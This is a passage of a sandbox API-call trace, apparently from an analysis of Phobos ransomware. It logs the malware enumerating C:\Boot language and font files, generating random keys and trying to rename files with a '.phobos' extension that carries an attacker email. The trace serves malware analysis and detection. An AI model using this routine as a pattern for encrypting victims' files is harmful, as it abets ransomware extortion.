(in: hFile=0xf0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=87616) returned 1 [0065.375] CloseHandle (hObject=0xf0) returned 1 [0065.375] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0065.375] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.375] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.376] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.376] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.376] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=91712) returned 1 [0065.377] CloseHandle (hObject=0xf0) returned 1 [0065.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0065.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.377] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.377] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.377] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.377] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=94800) returned 1 [0065.377] CloseHandle (hObject=0xf0) returned 1 [0065.378] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0065.378] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.378] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.378] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.378] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.378] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=85056) returned 1 [0065.379] CloseHandle (hObject=0xf0) returned 1 [0065.379] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui")) returned 0x20 [0065.379] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.379] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.379] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.379] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.379] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=43600) returned 1 [0065.380] CloseHandle (hObject=0xf0) returned 1 [0065.380] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui")) returned 0x20 [0065.380] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.380] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.380] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.380] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.380] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=90192) returned 1 [0065.381] CloseHandle (hObject=0xf0) returned 1 [0065.381] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui")) returned 0x20 [0065.381] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.381] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.381] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.381] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.381] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=89152) returned 1 [0065.382] CloseHandle (hObject=0xf0) returned 1 [0065.382] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui")) returned 0x20 [0065.382] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.382] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.382] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.382] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.382] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=3694080) returned 1 [0065.382] CloseHandle (hObject=0xf0) returned 1 [0065.383] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0x20 [0065.383] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0065.383] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0 [0065.383] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.383] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.384] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=3876772) returned 1 [0065.384] CloseHandle (hObject=0xf0) returned 1 [0065.384] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0x20 [0065.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0065.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0 [0065.385] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.385] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.385] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=1984228) returned 1 [0065.385] CloseHandle (hObject=0xf0) returned 1 [0065.385] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0x20 [0065.385] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0065.385] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf")) returned 0 [0065.385] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.385] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.386] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=2371360) returned 1 [0065.386] CloseHandle (hObject=0xf0) returned 1 [0065.386] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0065.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0065.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0 [0065.386] ResetEvent (hEvent=0xf8) returned 1 [0065.386] SetEvent (hEvent=0xf4) returned 1 [0065.386] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.386] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf0 [0065.387] GetFileSizeEx (in: hFile=0xf0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=47452) returned 1 [0065.387] CloseHandle (hObject=0xf0) returned 1 [0065.387] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20 [0065.387] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.387] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.387] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.423] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.426] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.426] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa0 [0065.426] GetFileSizeEx (in: hFile=0xa0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=90704) returned 1 [0065.426] CloseHandle (hObject=0xa0) returned 1 [0065.426] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0065.426] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.426] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.426] ResetEvent (hEvent=0xf8) returned 1 [0065.427] SetEvent (hEvent=0xf4) returned 1 [0065.427] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.427] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa0 [0065.427] GetFileSizeEx (in: hFile=0xa0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=76352) returned 1 [0065.427] CloseHandle (hObject=0xa0) returned 1 [0065.427] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0065.427] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.427] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.427] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.434] ResetEvent (hEvent=0xf8) returned 1 [0065.434] SetEvent (hEvent=0xf4) returned 1 [0065.434] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.434] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa0 [0065.435] GetFileSizeEx (in: hFile=0xa0, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=88144) returned 1 [0065.435] CloseHandle (hObject=0xa0) returned 1 [0065.435] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui")) returned 0x20 [0065.435] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.435] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.435] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.466] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.467] ResetEvent (hEvent=0xf8) returned 1 [0065.468] SetEvent (hEvent=0xf4) returned 1 [0065.468] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.468] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x108 [0065.468] GetFileSizeEx (in: hFile=0x108, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=90704) returned 1 [0065.468] CloseHandle (hObject=0x108) returned 1 [0065.468] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui")) returned 0x20 [0065.468] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.468] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.468] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.472] ResetEvent (hEvent=0xf8) returned 1 [0065.472] SetEvent (hEvent=0xf4) returned 1 [0065.472] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.472] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x108 [0065.472] GetFileSizeEx (in: hFile=0x108, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=89664) returned 1 [0065.472] CloseHandle (hObject=0x108) returned 1 [0065.472] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui")) returned 0x20 [0065.472] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.472] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.475] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.476] ResetEvent (hEvent=0xf8) returned 1 [0065.476] SetEvent (hEvent=0xf4) returned 1 [0065.476] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x10, pbBuffer=0x291f930 | out: pbBuffer=0x291f930) returned 1 [0065.476] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x108 [0065.476] GetFileSizeEx (in: hFile=0x108, lpFileSize=0x291f8d0 | out: lpFileSize=0x291f8d0*=87616) returned 1 [0065.476] CloseHandle (hObject=0x108) returned 1 [0065.476] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui")) returned 0x20 [0065.476] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0065.476] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0065.476] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0065.479] WaitForSingleObject (hHandle=0xf8, 